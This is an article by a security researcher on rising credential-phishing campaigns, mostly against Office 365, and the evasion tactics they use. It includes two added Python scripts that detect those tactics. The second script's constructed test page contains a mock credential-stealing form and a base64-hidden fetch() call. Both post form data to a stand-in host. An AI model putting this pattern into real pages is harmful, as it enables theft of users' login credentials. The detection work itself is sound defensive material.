Member Article
Credential phishing attacks on the rise with Office 365 as top target
Krishnan Subramanian, Security Researcher Menlo Labs
Credential phishing attacks are where attackers make use of fake login pages or forms to steal credentials of commonly used services within a corporate environment. At Menlo Labs, we have seen a number of interesting developments over the last month with a rise in credential phishing campaigns. Here we take a look at some of the latest tactics and themes being employed.
Office 365 remains top target
In the last month, the bulk of the credential phishing attacks were serving fake Outlook and Office 365 (O365) login pages, due primarily to the ubiquity of Office 365 services across corporate environments.
Looking at the distribution of Office 365 credential phishing campaigns by industry sector, we can see airline duty-free shop login credentials being targeted, which explains the travel industry's significant share of these campaigns (more than 50%).
Popular cloud services
There has also been an uptick in the number of phishing pages being hosted on popular cloud services. While services like Azure, OneDrive, Firebase, Box, and Dropbox continue to be leveraged to host phishing pages, one interesting addition to this list that we came across last month was a phishing page hosted on the popular note-taking app Evernote.
Attackers are always trying to come up with different tactics to bypass detection solutions. Below are some of the common tactics that are actively being used to serve phishing content.
Using data URLs and/or encoding to mask content: In one phishing HTML page, we observed data URLs being used to hide the JavaScript code that posts the credentials to a remote URL, and to encode and embed all of the page's custom CSS and images inline, so that no separate resource requests reveal them.
Dynamic Content Generation: One interesting tactic was observed in an Office 365 phishing campaign: the campaign appends the user's email address to the URL, the phishing page path is dynamically generated, and the user's email address is automatically filled into the login form.
Because the path of the phishing landing page is dynamically generated, the path name is fairly long and made up of random characters. It has two parts separated by the slash (/) character: a randomly generated folder name, followed by a randomly generated .php file name.
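The URL structure just described (a long random folder, a random .php file name, and the victim's email address appended to the URL) can be scored heuristically from proxy or mail-gateway logs without fetching the page. The following is an added example, not Menlo Labs code: the entropy and length thresholds are assumptions, and every URL in it is constructed for illustration.

```python
"""Heuristic check of a landing-page URL for the structure described above:
a long random folder, a random .php file, and the victim's e-mail appended to
the URL. Added example, not Menlo Labs code; all sample URLs are constructed."""
import math
import re
from urllib.parse import urlparse, unquote

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")
RANDOM_MIN_LEN = 12       # assumed threshold: generated names are "fairly long"
RANDOM_MIN_ENTROPY = 3.5  # assumed threshold in bits/char; English words sit well below


def shannon_entropy(s):
    """Shannon entropy of the characters of s in bits per character (0.0 if empty)."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(segment):
    """True for long, purely alphanumeric, high-entropy names such as generated folders."""
    return (len(segment) >= RANDOM_MIN_LEN
            and re.fullmatch(r"[A-Za-z0-9]+", segment) is not None
            and shannon_entropy(segment) >= RANDOM_MIN_ENTROPY)


def assess_url(url):
    """Return the indicators found in one URL and an overall verdict."""
    parsed = urlparse(url)
    segments = [s for s in parsed.path.split("/") if s]
    indicators = []

    # Random folder followed by a random .php file: strip the extension before scoring.
    stems = [s[:-4] if s.lower().endswith(".php") else s for s in segments]
    if sum(looks_random(s) for s in stems) >= 2:
        indicators.append("random_path_segments")
    if segments and segments[-1].lower().endswith(".php"):
        indicators.append("php_landing_page")

    # The user's e-mail address appended to the URL, in the query string or fragment.
    email = EMAIL_RE.search(unquote(parsed.query + " " + parsed.fragment))
    if email:
        indicators.append("email_in_url")

    return {
        "indicators": indicators,
        "email": email.group(0) if email else None,
        # The random structure is the anchor; one supporting indicator makes it suspicious,
        # so an ordinary intranet .php page with a user parameter is not flagged on its own.
        "suspicious": "random_path_segments" in indicators and len(indicators) >= 2,
    }


# Constructed sample URLs (not real campaign indicators).
SAMPLES = [
    "https://phish.example/q8Zx3vL0pT9mKw2R/a7Hn4kQz9cXe1Vb2.php?email=alice%40example.com",
    "https://login.microsoftonline.com/common/oauth2/authorize?client_id=abc",
    "https://intranet.example.org/reports/2023/q4-summary.php?user=alice@example.org",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(assess_url(u), u)
```

Run over URL columns exported from a proxy log, the check surfaces candidates for analyst review; the thresholds deliberately require the random two-segment path before any other indicator counts, which keeps legitimate `.php` pages that carry a user parameter out of the result set.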
Downloading local files as a decoy for serving the phishing page: Another commonly used tactic was to use local HTML/PDF decoy files to load the phishing content. In one example targeting Daum, a popular web service provider in South Korea, visiting the phishing landing page first downloads a decoy HTML file to the endpoint. The user's email address is appended to the URL as a parameter, and visiting the URL immediately triggers the download. Once the local HTML file is opened, the actual phishing form is loaded with the username already filled in. Using a decoy file like this to load the phishing form is an attempt to evade detection solutions that apply machine learning or pattern matching to the HTTP response content.
Dynamic loading of brand logos: Phishing pages often make use of APIs like Clearbit to dynamically load company-specific logos instead of generic Microsoft or Outlook logos. In this case, the phishing page tries to look up a company-specific logo using the Clearbit Logo API. If none is found, the regular Microsoft or Office logos are used.
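Several of the tactics above leave static traces in the fetched page or its response headers: scripts, stylesheets and images carried as data URLs, a form whose action points off the serving host, a logo pulled from the Clearbit Logo API, and a response that pushes an HTML file to disk instead of rendering it. The scanner below is an added example written for this article, not Menlo Labs code or Clearbit's API: it assumes `logo.clearbit.com` as the Logo API host, assumes the decoy download is driven by a `Content-Disposition: attachment` header (the article describes the download, not the mechanism), and builds its own constructed sample page and headers inline.

```python
"""Static indicator scan of a fetched login page for the evasion tactics described
above. Added example, not Menlo Labs code; the sample page and headers are constructed."""
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

LOGO_API_HOST = "logo.clearbit.com"   # assumed hostname of the Clearbit Logo API
DATA_URL_RE = re.compile(r"^\s*data:([^,]*),(.*)$", re.I | re.S)
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)


def _host(url):
    return (urlparse(url).hostname or "").lower()


class IndicatorParser(HTMLParser):
    """Walks the HTML and records each indicator once."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.found = set()
        self._in_script = False

    def _offsite(self, url):
        h = _host(url)
        return bool(h) and h != self.page_host

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}          # boolean attrs arrive as None
        src = a.get("src") or a.get("href") or ""
        if tag == "script":
            self._in_script = True
        m = DATA_URL_RE.match(src)
        if m:
            header, payload = m.group(1).lower(), m.group(2)
            mime = header.split(";")[0]
            if tag == "script" or "javascript" in mime:
                self.found.add("script_in_data_url")
                body = payload
                if ";base64" in header:
                    try:
                        body = base64.b64decode(payload).decode("utf-8", "replace")
                    except (binascii.Error, ValueError):
                        body = ""
                # The hidden script posting credentials to a remote URL leaves that URL in the decoded text.
                if any(self._offsite(u) for u in URL_RE.findall(body)):
                    self.found.add("hidden_script_contacts_offsite_host")
            elif tag == "link" or "css" in mime:
                self.found.add("css_in_data_url")
            elif tag == "img" or mime.startswith("image/"):
                self.found.add("image_in_data_url")
        if tag == "form" and self._offsite(a.get("action", "")):
            self.found.add("form_posts_offsite")
        if tag == "a" and "download" in a:
            self.found.add("forced_download_link")
        if LOGO_API_HOST in src:
            self.found.add("dynamic_brand_logo")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and LOGO_API_HOST in data:
            self.found.add("dynamic_brand_logo")


def check_headers(headers):
    """Flag a response that forces an HTML/PDF file download (assumed mechanism:
    Content-Disposition: attachment with an .html/.htm/.pdf filename)."""
    found = set()
    cd = {k.lower(): v for k, v in headers.items()}.get("content-disposition", "")
    if "attachment" in cd.lower():
        m = re.search(r'filename\*?="?([^";]+)', cd, re.I)
        if m and m.group(1).strip().lower().endswith((".html", ".htm", ".pdf")):
            found.add("decoy_file_download")
    return found


def scan(page_url, html, headers=None):
    """Return the serving host, the sorted indicators, and a verdict (two or more = suspicious)."""
    p = IndicatorParser(_host(page_url))
    p.feed(html)
    p.close()
    found = p.found | check_headers(headers or {})
    return {"host": p.page_host, "indicators": sorted(found), "suspicious": len(found) >= 2}


# --- constructed sample, not a real campaign artifact ---
HIDDEN_JS = 'fetch("https://collector.example/post.php",{method:"POST",body:new FormData(f)});'
SAMPLE_HTML = (
    '<html><head><link rel="stylesheet" href="data:text/css;base64,'
    + base64.b64encode(b"body{background:#fff}").decode() + '"></head><body>'
    + '<img src="https://logo.clearbit.com/example.com">'
    + '<form id="f" action="https://collector.example/post.php" method="post">'
    + '<input name="email"><input type="password" name="pw"></form>'
    + '<script src="data:text/javascript;base64,'
    + base64.b64encode(HIDDEN_JS.encode()).decode() + '"></script></body></html>'
)
SAMPLE_HEADERS = {"Content-Type": "text/html", "Content-Disposition": 'attachment; filename="login.html"'}

if __name__ == "__main__":
    print(scan("https://phish.example/login", SAMPLE_HTML, SAMPLE_HEADERS))
```

The decode step matters because a data URL is exactly the case the article calls out: the credential-posting script never appears as a separate request, so a detector that only inspects fetched resources misses it, while decoding the inline payload recovers the remote host it contacts. Any one indicator alone is weak evidence (many legitimate pages inline small images); the verdict here requires two, and the individual indicators are what an analyst should read.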
Cybercriminals keep adding complexity to their phishing campaigns in order to steal sensitive information. With free services like Let's Encrypt, it is becoming easier for attackers to host phishing sites behind SSL, with a relatively short TTL (time to live) for maximum hit rate before the site is reported or taken down.
Increasing cybersecurity awareness through the use of training and education initiatives is often helpful in reducing the impact of credential phishing attacks, but corporate users should be cautious when a site presents a form that asks for personal or sensitive information.
This was posted in Bdaily's Members' News section by Amanda Hassall.